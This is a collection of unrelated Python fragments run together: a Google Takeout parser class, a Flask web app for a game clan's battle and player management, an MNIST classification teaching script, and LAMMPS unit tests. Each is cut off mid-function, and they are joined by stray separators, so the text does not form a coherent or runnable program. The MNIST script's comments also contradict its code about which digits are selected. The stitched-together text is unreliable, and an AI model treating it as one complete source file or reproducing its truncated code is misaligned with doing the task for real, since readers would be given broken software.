r"Home App/": None,
r"Mail/": None,
r"Maps/": None,
r"News/": None,
r"Profile/Profile.json": None,
r"Saved/Favorite places.csv": None,
r"Search Contributions/": None,
r"archive_browser.html": None, # description of takeout, not that useful
}
HandlerMatch = Res[Optional[HandlerFunction]]
ErrorPolicy = Literal["yield", "raise", "drop"]
class TakeoutParser:
def __init__(
self,
takeout_dir: PathIsh,
cachew_identifier: Optional[str] = None,
warn_exceptions: bool = True,
error_policy: ErrorPolicy = "yield",
additional_handlers: Optional[HandlerMap] = None,
) -> None:
"""
takeout_dir: Path to the google takeout directory
cachew_identifier: some unique string that identifies this takeout
If not given, approximates using the full path. Useful if you're
temporarily extracting the zipfile to extract events or if the
Takeout dir path isn't at its regular location
error_policy: How to handle exceptions while parsing:
"yield": return as part of the results (default)
"raise": raise exceptions
"drop": drop/ignore exceptions
"""
# isinstance check to avoid messing up objects which mimic Path (e.g. zip wrappers)
takeout_dir = takeout_dir if isinstance(takeout_dir, Path) else Path(takeout_dir)
self.takeout_dir = takeout_dir.absolute()
if not self.takeout_dir.exists():
raise FileNotFoundError(f"{self.takeout_dir} does not exist!")
self.cachew_identifier: Optional[str] = cachew_identifier
self.additional_handlers = (
{} if additional_handlers is None else additional_handlers
)
self.error_policy: ErrorPolicy = error_policy
self.warn_exceptions = warn_exceptions
self._warn_if_no_activity()
def _warn_if_no_activity(self) -> None:
# most common is probably 'My Activity'?
# can be used as a check to see if the user passed a wrong directory
activity_dir = "My Activity"
expected = self.takeout_dir / activity_dir
if not expected.exists():
logger.warning(
f"Warning: given '{self.takeout_dir}', expected the '{activity_dir}' directory at '{expected}'. Perhaps you passed the wrong location?"
)
@staticmethod
def _match_handler(p: Path, handler: HandlerMap) -> HandlerMatch:
"""
Match one of the handler regexes to a function which parses the file
"""
assert not p.is_absolute(), p # should be relative to Takeout dir
# replace OS-specific (e.g. windows) path separator to match the handler
sf = str(p).replace(os.sep, "/")
for prefix, h in handler.items():
# regex match the map (e.g. above)
if bool(re.match(prefix, sf)):
return h # could be None, if chosen to ignore
else:
return RuntimeError(f"No function to handle parsing {sf}")
# TODO: cache? may run into issues though
def dispatch_map(self) -> Dict[Path, HandlerFunction]:
res: Dict[Path, HandlerFunction] = {}
for f in self.takeout_dir.rglob("*"):
if f.name.startswith("."):
continue
if not f.is_file():
continue
rf = f.relative_to(self.takeout_dir)
# if user overrode some function, use that
user_handler: HandlerMatch = self.__class__._match_handler(
rf, self.additional_handlers
)
# user handler matched something
if not isinstance(user_handler, Exception):
# if not explicitly ignored by the handler map
if user_handler is not None:
res[f] = user_handler
continue
# don't raise errors here since the DEFAULT_HANDLER_MAP may handle parsing it
# try the default matchers
def_handler: HandlerMatch = self.__class__._match_handler(
rf, DEFAULT_HANDLER_MAP
)
# default handler
if not isinstance(def_handler, Exception):
# if not explicitly ignored by the handler map
if def_handler is not None:
res[f] = def_handler
continue
else:
# this is an exception specifying an unhandled file
# this shouldn't cause a fatal error, so don't check
# error_policy here, just warn the user
if self.warn_exceptions:
logger.warning(str(def_handler))
return res
def _log_handler(self, path: Path, handler: Any) -> None:
"""Log the path/function parsing it"""
rel_path = str(path)[len(str(self.takeout_dir)) + 1 :]
func_name: str = getattr(handler, "__name__", str(handler))
logger.info(f"Parsing '{rel_path}' using '{func_name}'")
def _parse_raw(self, filter_type: Optional[Type[BaseEvent]] = None) -> BaseResults:
"""Parse the takeout with no cache. If a filter is specified, only parses those files"""
handlers = self._group_by_return_type(filter_type=filter_type)
for cache_key, result_tuples in handlers.items():
for (path, itr) in result_tuples:
self._log_handler(path, itr)
yield from itr
def _handle_errors(self, results: BaseResults) -> BaseResults:
"""Wrap the results and handle any errors according to the policy"""
for e in results:
if not isinstance(e, Exception):
yield e
else:
if self.warn_exceptions:
logger.warning(str(e))
# return errors as part of the result, default
if self.error_policy == "yield":
yield e
# raise errors; crash
elif self.error_policy == "raise":
raise e
# ignore errors
elif self.error_policy == "drop":
continue
def parse(
self, cache: bool = False, filter_type: Optional[Type[BaseEvent]] = None
) -> BaseResults:
"""
Parses the Takeout
if cache is True, using | |
"""
The Web Application
~~~~~~~~~~~~~~~~~~~
Implementation of all request handlers and core functionality.
"""
import csv
import datetime
import os
import pickle
import logging
import hashlib
import tarfile
import calendar
from cStringIO import StringIO
from collections import defaultdict, OrderedDict
from functools import wraps
from datetime import timedelta
import jinja2
from flask import Flask, g, session, render_template, flash, redirect, request, url_for, abort, make_response, jsonify
from flask import Response
from flask_openid import OpenID
from flask_cache import Cache
from sqlalchemy import or_, and_, alias
from sqlalchemy.orm import joinedload, joinedload_all
from werkzeug.utils import secure_filename, Headers
from pytz import timezone
from . import config, replays, wotapi, util, constants, analysis
from .model import Player, Battle, BattleAttendance, Replay, BattleGroup, db_session, WebappData
# Set up Flask application
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = config.DATABASE_URI
app.config['SQLALCHEMY_ECHO'] = False
app.config['SECRET_KEY'] = config.SECRET_KEY
app.config['UPLOAD_FOLDER'] = config.UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # 16 MB at a time should be plenty for replays
cache = Cache(app, config={'CACHE_TYPE': 'simple'})
oid = OpenID(app, config.OID_STORE_PATH)
app.jinja_env.undefined = jinja2.StrictUndefined
app.jinja_env.filters['pretty_date'] = util.pretty_date
app.jinja_env.filters['int'] = int
app.jinja_env.globals['datetime'] = datetime
app.jinja_env.globals['STATISTICS_VISIBLE'] = config.STATISTICS_VISIBLE
# Uncomment to set up middleware in case we are behind a reverse proxy server
# from .util import ReverseProxied
# app.wsgi_app = ReverseProxied(app.wsgi_app)
# Set up error logging
if not app.debug and config.ERROR_LOG_FILE:
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler(config.ERROR_LOG_FILE, maxBytes=5 * 1024 * 1024, backupCount=5)
file_handler.setLevel(logging.WARNING)
file_handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(file_handler)
# Set up application logging
logger = logging.getLogger(__name__)
if config.LOG_FILE:
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler(config.LOG_FILE, maxBytes=5 * 1024 * 1024, backupCount=5)
file_handler.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
file_handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '))
logger.addHandler(file_handler)
@app.before_request
def csrf_protect():
if request.method == "POST":
token = session.pop('_csrf_token', None)
if not token or token != request.form.get('_csrf_token'):
flash('Invalid CSRF token. Please try again or contact an administrator for help.')
return redirect(url_for('index'))
# noinspection PyUnusedLocal
@app.teardown_appcontext
def shutdown_session(exception=None):
"""Remove the database session at the end of the request or when the application shuts down.
This is needed to use SQLAlchemy in a declarative way."""
db_session.remove()
def generate_csrf_token():
if '_csrf_token' not in session:
session['_csrf_token'] = hashlib.sha1(os.urandom(64)).hexdigest()
return session['_csrf_token']
app.jinja_env.globals['csrf_token'] = generate_csrf_token
# decorates a decorator function to be able to specify parameters :-)
decorator_with_args = lambda decorator: lambda *args, **kwargs: \
lambda func: decorator(func, *args, **kwargs)
@app.before_request
def lookup_current_user():
g.player = None
if 'openid' in session:
# Checking if player exists for every request might be overkill
g.player = Player.query.filter_by(openid=session.get('openid')).first()
if g.player and g.player.locked:
g.player = None
session.pop('openid', None)
# noinspection PyPep8Naming
@app.before_request
def inject_constants():
"""
Inject some commonly used constants into the global object 'g' so they don't
have to pass them around everywhere.
:return:
"""
g.clans = config.CLAN_NAMES
g.clan_ids = config.CLAN_IDS
g.roles = config.ROLE_LABELS
g.PAYOUT_ROLES = config.PAYOUT_ROLES
g.WOT_SERVER_REGION_CODE = config.WOT_SERVER_REGION_CODE
g.DELETE_BATTLE_ROLES = config.DELETE_BATTLE_ROLES
g.COMMANDED_ROLES = config.COMMANDED_ROLES
g.CREATE_BATTLE_ROLES = config.CREATE_BATTLE_ROLES
g.ADMINS = config.ADMINS
g.ADMIN_ROLES = config.ADMIN_ROLES
g.PLAYER_PERFORMANCE_ROLES = config.PLAYER_PERFORMANCE_ROLES
g.RESERVE_SIGNUP_ALLOWED = config.RESERVE_SIGNUP_ALLOWED
g.MENU_LINKS = config.MENU_LINKS
g.MAP_URL = config.MAP_URL
g.STORE_REPLAYS_IN_DB = config.STORE_REPLAYS_IN_DB
g.DOWNLOAD_REPLAY_ROLES = config.DOWNLOAD_REPLAY_ROLES
def require_login(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if g.player is None or g.player.locked:
return redirect(url_for('login', next=request.url))
return f(*args, **kwargs)
return decorated_function
def require_clan_membership(f):
"""
Request handler decorator that only allows access to an URL
parametrized with the clan name if the logged in user is a member
of the clan.
:param f:
:return:
"""
@wraps(f)
def decorated_f(*args, **kwargs):
if g.player is None:
return redirect(url_for('login', next=request.url))
# Has to be a request handler with 'clan' as argument (e.g. /battles/<clan>/)
if not 'clan' in kwargs:
abort(500)
if g.player.clan != kwargs['clan'] and g.player.name not in config.ADMINS:
abort(403)
return f(*args, **kwargs)
return decorated_f
@decorator_with_args
def require_role(f, roles):
"""
Request handler decorator that requires the logged in user to have a certain
role, i.e. clan commander, treasurer, ...
:param f:
:param roles: iterable of strings with the allowed roles
:return:
"""
@wraps(f)
def decorated_f(*args, **kwargs):
if g.player is None:
return redirect(url_for('login', next=request.url))
if g.player.role not in roles and g.player.name not in config.ADMINS:
abort(403)
return f(*args, **kwargs)
return decorated_f
@app.route('/sync-players/')
@app.route('/sync-players/<int:clan_id>')
def sync_players(clan_id=None):
"""
Synchronize players in the database with Wargaming servers.
:param clan_id:
:return:
"""
if config.API_KEY == request.args['API_KEY']:
if clan_id:
clan_ids = [clan_id]
else:
clan_ids = config.CLAN_IDS.values()
for clan_id in clan_ids:
logger.info("Clan member synchronization triggered for " + str(clan_id))
webapp_data = WebappData.get()
webapp_data.last_sync_attempt = datetime.datetime.now()
db_session.add(webapp_data)
db_session.commit()
db_session.remove()
clan_info = wotapi.get_clan(str(clan_id))
player_ids = clan_info['data'][str(clan_id)]['members'].keys()
players_info = wotapi.get_players(player_ids)
member_info_data = {}
for i in xrange(0, len(player_ids), 20):
member_info_data.update(wotapi.get_players_membership_info(player_ids[i:i+20])['data'])
processed = set()
for player_id in player_ids:
player = clan_info['data'][str(clan_id)]['members'][player_id]
player_data = players_info['data'][player_id]
member_data = member_info_data[player_id]
p = Player.query.filter_by(wot_id=str(player['account_id'])).first()
if not player_data:
if p:
processed.add(p.id) # skip this guy later when locking players
logger.info("Missing player info of " + player['account_name'])
continue # API Error?
since = datetime.datetime.fromtimestamp(
float(member_data['joined_at']))
if p:
# Player exists, update information
processed.add(p.id)
p.name = player['account_name']
p.openid = 'https://'+config.WOT_SERVER_REGION_CODE+'.wargaming.net/id/' + str(player_id) + '-' + player['account_name'] + '/'
p.locked = False
p.clan = clan_info['data'][str(clan_id)]['tag']
p.role = player['role'] # role might have changed
p.member_since = since # might have rejoined
else:
# New player
p = Player(str(player['account_id']),
'https://'+config.WOT_SERVER_REGION_CODE+'.wargaming.net/id/' + str(player['account_id']) + '-' + player[
'account_name'] + '/',
since,
player['account_name'],
clan_info['data'][str(clan_id)]['tag'],
player['role'])
logger.info('Adding player ' + player['account_name'])
db_session.add(p)
# All players of the clan in the DB, which are no longer in the clan
for player in Player.query.filter_by(clan=clan_info['data'][str(clan_id)]['tag']):
if player.id in processed or player.id is None or player.locked:
continue
logger.info("Locking player " + player.name)
player.locked = True
player.lock_date = datetime.datetime.now()
db_session.add(player)
webapp_data.last_successful_sync = datetime.datetime.now()
db_session.add(webapp_data)
db_session.commit()
logger.info("Clan member synchronization successful")
else:
abort(403)
return redirect(url_for('index'))
@app.route("/")
def index():
"""
Front page with latest battles played and scheduled battles.
:return:
"""
if g.player:
latest_battles = Battle.query.filter_by(clan=g.player.clan).order_by('date desc').limit(3)
# Cache provinces owned for 60 seconds to avoid spamming WG's server
@cache.memoize(timeout=60)
def cached_provinces_owned(clan_id):
logger.info("Querying Wargaming server for provinces owned by clan " + str(clan_id) + " " + g.player.clan)
try:
return wotapi.get_provinces(clan_id)
except Exception:
logger.exception("Error querying WG server for provinces owned")
return None
@cache.memoize(timeout=60)
def cached_battle_schedule(clan_id):
logger.info("Querying Wargaming server for battle schedule of clan " + str(clan_id) + " " + g.player.clan)
try:
return wotapi.get_battle_schedule(clan_id)
except Exception:
logger.exception("Error querying WG server for battle schedule")
return None
provinces_owned = cached_provinces_owned(config.CLAN_IDS[g.player.clan])
total_revenue = 0
if provinces_owned:
for p in provinces_owned:
total_revenue += p['daily_revenue']
scheduled_battles = cached_battle_schedule(config.CLAN_IDS[g.player.clan])
else:
latest_battles = None
scheduled_battles = None
provinces_owned = None
total_revenue = 0
return render_template('index.html', clans=config.CLAN_NAMES, latest_battles=latest_battles,
scheduled_battles=scheduled_battles, provinces_owned=provinces_owned,
total_revenue=total_revenue, datetime=datetime)
@app.route('/admin')
@require_login
@require_role(config.ADMIN_ROLES)
def admin():
"""
Administration page.
:return:
"""
return render_template('admin.html', webapp_data=WebappData.get(), API_KEY=config.API_KEY)
@app.route('/help')
def help_page():
"""
Help page.
:return:
"""
return render_template('help.html')
@app.route('/attributions')
def attributions():
"""
Page with attributions and licencing information.
:return:
"""
return render_template('attributions.html')
@app.route('/login', methods=['GET', 'POST'])
@oid.loginhandler
def login():
"""
Login page.
:return:
"""
if g.player is not None:
return redirect(oid.get_next_url())
if request.method == 'POST':
openid = request.form.get('openid', "http://eu.wargaming.net/id")
if openid:
return oid.try_login(openid, ask_for=['nickname'])
return render_template('login.html', next=oid.get_next_url(),
error=oid.fetch_error())
@oid.after_login
def create_or_login(resp):
"""
This is called when login with OpenID succeeded and it's not
necessary to figure out if this is the users's first login or not.
This function has to redirect otherwise the user will be presented
with a terrible URL which we certainly don't want.
"""
session['openid'] = resp.identity_url
session['nickname'] = resp.nickname
player = Player.query.filter_by(openid=resp.identity_url, locked=False).first()
if player is not None:
flash(u'Signed in successfully', 'success')
session.permanent = True
g.player = player
return redirect(oid.get_next_url())
return redirect(url_for('create_profile', next=oid.get_next_url(),
name=resp.nickname))
@app.route('/create-profile', methods=['GET', 'POST'])
def create_profile():
"""
If this is the user's first login, the create_or_login function
will redirect here so that the user can set up his profile.
"""
if g.player is not None or 'openid' not in session or 'nickname' not in session:
return redirect(url_for('index'))
if request.method == 'POST':
wot_id = [x for x in session['openid'].split('/') if x][-1].split('-')[0]
if not wot_id:
flash(u'Error: Could not determine your player ID from the OpenID string. Contact an admin for help :-)',
'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
player_data = wotapi.get_player(wot_id)
player_clan_info = wotapi.get_players_membership_info([wot_id])
if not player_data or not player_data['data'][str(wot_id)]:
flash(u'Error: Could not retrieve player information from Wargaming. Contact an admin for help :-)',
'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
clan_ids_to_name = dict((v, k) for k, v in config.CLAN_IDS.iteritems())
clan_id = str(player_clan_info['data'][str(wot_id)]['clan']['clan_id'])
if clan_id not in config.CLAN_IDS.values():
flash(u'You have to be in one of the clans to login', 'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
clan = clan_ids_to_name[str(clan_id)]
role = player_clan_info['data'][str(wot_id)]['role']
member_since = datetime.datetime.fromtimestamp(float(player_clan_info['data'][str(wot_id)]['joined_at']))
if not role:
flash(u'Error: Could not retrieve player role from wargaming server', 'error')
return render_template('create_profile.html', next_url=oid.get_next_url())
db_session.add(Player(wot_id, session['openid'], member_since, session['nickname'], clan, role))
db_session.commit()
logger.info("New player profile registered [" + session['nickname'] + ", " + clan + | |
<filename>src/Classes/MSDS422/Module_05/exploring-mnist-v001.py
# Exploring MNIST with Binary Classification (Python SciKit Learn)
# program revised by <NAME> (2017/10/18)
# Using data from the MNIST dataset from Scikit Learn and
# beginning with code from chapter 3 of <NAME>. 2017.
# Hands-On Machine Learning with Scikit-Learn & TensorFlow:
# Concepts, Tools, and Techniques to Build Intelligent Systems.
# Sebastopol, Calif.: O'Reilly. [ISBN-13 978-1-491-96229-9]
# Source code available at https://github.com/ageron/handson-ml
# Relevant code examples in the Python notebook 03_classification.ipynb
# Data from MNIST may be used to evaluate machine learning classifiers.
# Here we will use a subset of the MNIST data to study binary classifiers.
# In particular, after exploring the entire MNIST data set, we will
# select a subset of the data... just the digits 0 and 6
# Scikit Learn documentation for this assignment:
# http://scikit-learn.org/stable/modules/model_evaluation.html
# http://scikit-learn.org/stable/modules/generated/
# sklearn.model_selection.KFold.html
# prepare for Python version 3x features and functions
# comment out for Python 3.x execution
# from __future__ import division, print_function, unicode_literals
# from future_builtins import ascii, filter, hex, map, oct, zip
# to obtain a listing of the results of this program,
# locate yourself in the working direcotry and
# execute the following command in a terminal or commands window
# python exploring-mnist-v001.py > listing-exploring-mnist-v001.txt
# Scikit Learn documentation for this assignment:
# http://scikit-learn.org/stable/auto_examples/classification/
# plot_classifier_comparison.html
# http://scikit-learn.org/stable/modules/generated/
# sklearn.naive_bayes.BernoulliNB.html#sklearn.naive_bayes.BernoulliNB.score
# http://scikit-learn.org/stable/modules/generated/
# sklearn.linear_model.LogisticRegression.html
# http://scikit-learn.org/stable/modules/model_evaluation.html
# http://scikit-learn.org/stable/modules/generated/
# sklearn.model_selection.KFold.html
# seed value for random number generators to obtain reproducible results
RANDOM_SEED = 1
RANDOM_SEED_MODEL = 9999
# import base packages into the namespace for this program
import numpy as np
import pandas as pd
# visualization utilities
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages # plot to pdf files
# user-defined function for displaying observations/handwritten digits
# adapted from Géron (2017) Python notebook code (default 10 images per row)
def plot_digits(instances, images_per_row = 10, **options):
size = 28
images_per_row = min(len(instances), images_per_row)
images = [instance.reshape(size,size) for instance in instances]
n_rows = (len(instances) - 1) // images_per_row + 1
row_images = []
n_empty = n_rows * images_per_row - len(instances)
images.append(np.zeros((size, size * n_empty)))
for row in range(n_rows):
rimages = images[row * images_per_row : (row + 1) * images_per_row]
row_images.append(np.concatenate(rimages, axis=1))
image = np.concatenate(row_images, axis=0)
plt.imshow(image, cmap = matplotlib.cm.binary, **options)
plt.axis('off')
# --------------------------------------------------------
# cross-validation scoring code adapted from Scikit Learn documentation
from sklearn.metrics import roc_auc_score
# specify the set of classifiers being evaluated
from sklearn.naive_bayes import BernoulliNB
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC
names = ["Naive_Bayes", "Logistic_Regression",
"Linear_SVM_C=0.1"]
classifiers = [BernoulliNB(alpha=1.0, binarize=0.5,
class_prior = [0.5, 0.5], fit_prior=False),
LogisticRegression(),
Pipeline((
("scaler", StandardScaler()),
("svc", SVC(kernel = 'linear',
probability = True, C = 0.1,
random_state = RANDOM_SEED_MODEL)),
))]
# --------------------------------------------------------
# import data from Scikit Learn and explore the data
from sklearn.datasets import fetch_mldata
mnist = fetch_mldata('MNIST original')
mnist # show structure of datasets Bunch object from Scikit Learn
# define arrays from the complete data set
mnist_X, mnist_y = mnist['data'], mnist['target']
# show stucture of numpy arrays
# 70,000 observations, 784 explanatory variables/features
# features come from 28x28 pixel displays
# response is a single digit 0 through 9
print('\n Structure of explanatory variable array:', mnist_X.shape)
print('\n Structure of response array:', mnist_y.shape)
# note the sequential organization of the MNIST data with index plot
# route plot to external pdf file
with PdfPages('plot-mnist-index-plot.pdf') as pdf:
fig, axis = plt.subplots()
axis.set_xlabel('Sequence/Index number within MNIST Data Set')
axis.set_ylabel('MNIST Digit')
plt.title('Index Plot of MNIST Data Set')
plt.plot(mnist_y[:,])
pdf.savefig() # saves the current figure into a pdf page
plt.close()
# summarize the sequential structure of the MNIST data
# target/label and index values for the observations
# the first 60 thousand observations are often used as training data
# they cover the ten digits... aranged in order... that is, zeros come
# before ones, ones before twos, and so on
# but the observed digit frequencies are unequal
# examine the frequency distributions for the digits using pandas DataFrame
# the first 60 thousand observations are often used as training data
mnist_y_0_59999_df = pd.DataFrame({'label': mnist_y[0:59999,]})
print('\nFrequency distribution for 60,000 observations (for model building)')
print(mnist_y_0_59999_df['label'].value_counts(ascending = True))
# the last 10000 observations cover the ten digits
# these are often used as test data
# digits are arranged in order but the frequencies are unequal
mnist_y_60000_69999_df = pd.DataFrame({'label': mnist_y[60000:69999,]})
print('\nFrequency distribution for last 10,000 observations (holdout sample)')
print(mnist_y_60000_69999_df['label'].value_counts(ascending = True))
# in selecting handwritten digits to represent,
# we will randomly sample from digit representations
from sklearn.utils import resample
# display example data from the 28x28 pixel displays
# ten-page pdf file, 100 digit realizations on each page
# using examples from the full MNIST data set
#
# we customize the location within the subplot for each page using GridSpec
# see matplotlib documentation: http://matplotlib.org/users/gridspec.html
# begin by showing samples from the model building data (first 60000 observations)
with PdfPages('plot-mnist-handwritten-digits-model-building-data.pdf') as pdf:
for idigit in range(0,10):
# print('\nworking on digit', idigit)
# identify the index values from the first 60000 observations
# that have the label equal to a specific digit (idigit)
idigit_indices = \
mnist_y_0_59999_df.index[mnist_y_0_59999_df.label == idigit]
# obtain indices for 100 randomly sampled observations for this digit
show_indices = resample(idigit_indices, n_samples=100,
replace = False,
random_state = RANDOM_SEED).sort_values()
plt.figure(0)
plt.suptitle('Examples of MNIST Data for Digit ' + str(idigit))
# define beginning and ending row index for this digit
# generate ten rows of ten digits each
for j in range(0,10):
row_begin_index = j * 10
row_end_index = row_begin_index + 10
# print('row begin',row_begin_index, 'row_end', row_end_index)
this_row_indices = show_indices[row_begin_index:row_end_index]
example_images = np.r_[mnist_X[this_row_indices]]
# print(mnist_y[this_row_indices,])
plt.subplot2grid((10,1), (j,0), colspan=1)
# plot ten digits per row using user-defined function
plot_digits(example_images, images_per_row=10)
row_begin_index = row_end_index + 1
pdf.savefig()
plt.close()
# also show samples from the holdout data (last 10000 observations)
with PdfPages('plot-mnist-handwritten-digits-holdout-data.pdf') as pdf:
for idigit in range(0,10):
# print('\nworking on digit', idigit)
# identify the index values from the first 60000 observations
# that have the label equal to a specific digit (idigit)
idigit_indices = 60000 + \
mnist_y_60000_69999_df.index[mnist_y_60000_69999_df.label == idigit]
# obtain indices for 100 randomly sampled observations for this digit
show_indices = resample(idigit_indices, n_samples=100,
replace = False,
random_state = RANDOM_SEED).sort_values()
plt.figure(0)
plt.suptitle('Examples of MNIST Data for Digit ' + str(idigit))
# define beginning and ending row index for this digit
# generate ten rows of ten digits each
for j in range(0,10):
row_begin_index = j * 10
row_end_index = row_begin_index + 10
# print('row begin',row_begin_index, 'row_end', row_end_index)
this_row_indices = show_indices[row_begin_index:row_end_index]
example_images = np.r_[mnist_X[this_row_indices]]
# print(mnist_y[this_row_indices,])
plt.subplot2grid((10,1), (j,0), colspan=1)
# plot ten digits per row using user-defined function
plot_digits(example_images, images_per_row=10)
row_begin_index = row_end_index + 1
pdf.savefig()
plt.close()
# ------------------------------------------------------------------------
# select a subset of the model building data... observations for digits 0 and 1
# these will comprise the data we use in model development/building
# and to select "best" modeling methods within a cross-validation design
model_indices_for_zeros = \
mnist_y_0_59999_df.index[mnist_y_0_59999_df.label == 0]
model_indices_for_ones = \
mnist_y_0_59999_df.index[mnist_y_0_59999_df.label == 1]
model_indices = np.append(model_indices_for_zeros,
model_indices_for_ones)
model_y = np.r_[mnist_y[model_indices]]
model_X = np.r_[mnist_X[model_indices]]
model_data = np.concatenate((model_y.reshape(-1, 1), model_X), axis = 1)
# check on shape of the model_data array
print('\nShape of model_data:', model_data.shape)
# set up model_data for modeling work consisting of selected X and y rows
# let's put the y values in the first column and X values in remainng columns
# we are setting aside the zeros and ones from the last 10000 observations
# these will compose a hold-out sample for final testing of the selected model
# select a subset of the hold-out test data... observations for digits 0 and 1
holdout_indices_for_zeros = 60000 + \
mnist_y_60000_69999_df.index[mnist_y_60000_69999_df.label == 0]
holdout_indices_for_ones = 60000 + \
mnist_y_60000_69999_df.index[mnist_y_60000_69999_df.label == 1]
holdout_indices = np.append(holdout_indices_for_zeros,
holdout_indices_for_ones)
holdout_y = np.r_[mnist_y[holdout_indices]]
holdout_X = np.r_[mnist_X[holdout_indices]]
holdout_data = np.concatenate((holdout_y.reshape(-1, 1),
holdout_X), axis = 1)
# check on shape of the holdout_data array
print('\nShape of holdout_data:', holdout_data.shape)
# shuffle the rows because MNIST data rows have a sequence
# with lower digits coming before higher digits
# shuffle is by the first index, which is the rows
np.random.seed(RANDOM_SEED)
np.random.shuffle(model_data)
np.random.seed(RANDOM_SEED)
np.random.shuffle(holdout_data)
# --------------------------------------------------------
# specify the k-fold cross-validation design
from sklearn.model_selection import KFold
# ten-fold cross-validation employed here
# As an alternative to 10-fold cross-validation, restdata with its
# small sample size could be analyzed would be a good candidate
# for leave-one-out cross-validation, which would | |
# coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import numpy as np
import pandas as pd
import os
import re
from pyiron_base import state, ProjectHDFio
from pyiron_atomistics.atomistics.structure.atoms import Atoms
from pyiron_atomistics.lammps.lammps import Lammps
from pyiron_atomistics.lammps.base import LammpsStructure, UnfoldingPrism
from pyiron_atomistics.lammps.units import LAMMPS_UNIT_CONVERSIONS, UnitConverter
import ase.units as units
from pyiron_base._tests import TestWithCleanProject
class TestLammps(TestWithCleanProject):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.execution_path = os.path.dirname(os.path.abspath(__file__))
state.update({'resource_paths': os.path.join(os.path.dirname(os.path.abspath(__file__)), "../static")})
@classmethod
def tearDownClass(cls):
super().tearDownClass()
state.update()
def setUp(self) -> None:
super().setUp()
self.job = Lammps(
project=ProjectHDFio(project=self.project, file_name="lammps"),
job_name="lammps",
)
self.ref = Lammps(
project=ProjectHDFio(project=self.project, file_name="ref"),
job_name="ref",
)
# Creating jobs this way puts them at the right spot, but decouples them from our self.project instance.
# I still don't understand what's happening as deeply as I'd like (at all!) but I've been fighting with it too
# long, so for now I will just force the issue by redefining the project attribute(s). -<NAME>
self.project = self.job.project
self.ref_project = self.ref.project
def tearDown(self) -> None:
super().tearDown()
self.ref_project.remove_jobs_silently(recursive=True) # cf. comment in setUp
def test_selective_dynamics(self):
atoms = Atoms("Fe8", positions=np.zeros((8, 3)), cell=np.eye(3))
atoms.add_tag(selective_dynamics=[True, True, True])
self.job.structure = atoms
self.job._set_selective_dynamics()
self.assertFalse("group" in self.job.input.control._dataset["Parameter"])
atoms.add_tag(selective_dynamics=None)
atoms.selective_dynamics[1] = [True, True, False]
atoms.selective_dynamics[2] = [True, False, True]
atoms.selective_dynamics[3] = [False, True, True]
atoms.selective_dynamics[4] = [False, True, False]
atoms.selective_dynamics[5] = [False, False, True]
atoms.selective_dynamics[6] = [True, False, False]
atoms.selective_dynamics[7] = [False, False, False]
self.job.structure = atoms
self.job._set_selective_dynamics()
for constraint in ["x", "y", "z", "xy", "yz", "xz", "xyz"]:
self.assertTrue(
f"group___constraint{constraint}" in self.job.input.control._dataset["Parameter"],
msg=f"Failed to find group___constraint{constraint} in control"
)
def test_structure_atomic(self):
atoms = Atoms("Fe1", positions=np.zeros((1, 3)), cell=np.eye(3))
lmp_structure = LammpsStructure()
lmp_structure._el_eam_lst = ["Fe"]
lmp_structure.structure = atoms
self.assertEqual(
lmp_structure._dataset["Value"],
[
"Start File for LAMMPS",
"1 atoms",
"1 atom types",
"",
"0. 1.000000000000000 xlo xhi",
"0. 1.000000000000000 ylo yhi",
"0. 1.000000000000000 zlo zhi",
"",
"Masses",
"",
"1 55.845000",
"",
"Atoms",
"",
"1 1 0.000000000000000 0.000000000000000 0.000000000000000",
"",
],
)
def test_structure_charge(self):
atoms = Atoms("Fe1", positions=np.zeros((1, 3)), cell=np.eye(3))
atoms.set_initial_charges(charges=np.ones(len(atoms)) * 2.0)
lmp_structure = LammpsStructure()
lmp_structure.atom_type = "charge"
lmp_structure._el_eam_lst = ["Fe"]
lmp_structure.structure = atoms
self.assertEqual(
lmp_structure._dataset["Value"],
[
"Start File for LAMMPS",
"1 atoms",
"1 atom types",
"",
"0. 1.000000000000000 xlo xhi",
"0. 1.000000000000000 ylo yhi",
"0. 1.000000000000000 zlo zhi",
"",
"Masses",
"",
"1 55.845000",
"",
"Atoms",
"",
"1 1 2.000000 0.000000000000000 0.000000000000000 0.000000000000000",
"",
],
)
def test_avilable_versions(self):
self.job.executable = os.path.abspath(
os.path.join(
self.execution_path,
"..",
"static",
"lammps",
"bin",
"run_lammps_2018.03.16.sh",
)
)
self.assertTrue([2018, 3, 16] == self.job._get_executable_version_number())
self.job.executable = os.path.abspath(
os.path.join(
self.execution_path,
"..",
"static",
"lammps",
"bin",
"run_lammps_2018.03.16_mpi.sh",
)
)
self.assertTrue([2018, 3, 16] == self.job._get_executable_version_number())
def _build_water(self, y0_shift=0.):
density = 1.0e-24 # g/A^3
n_mols = 27
mol_mass_water = 18.015 # g/mol
# Determining the supercell size size
mass = mol_mass_water * n_mols / units.mol # g
vol_h2o = mass / density # in A^3
a = vol_h2o ** (1.0 / 3.0) # A
# Constructing the unitcell
n = int(round(n_mols ** (1.0 / 3.0)))
dx = 0.7
r_O = [0, 0, 0]
r_H1 = [dx, dx, 0]
r_H2 = [-dx, dx, 0]
unit_cell = (a / n) * np.eye(3)
unit_cell[0][1] += y0_shift
water = Atoms(elements=["H", "H", "O"], positions=[r_H1, r_H2, r_O], cell=unit_cell, pbc=True)
water.set_repeat([n, n, n])
return water
def test_lammps_water(self):
self.job.structure = self._build_water()
with self.assertWarns(UserWarning):
self.job.potential = "H2O_tip3p"
with self.assertRaises(ValueError):
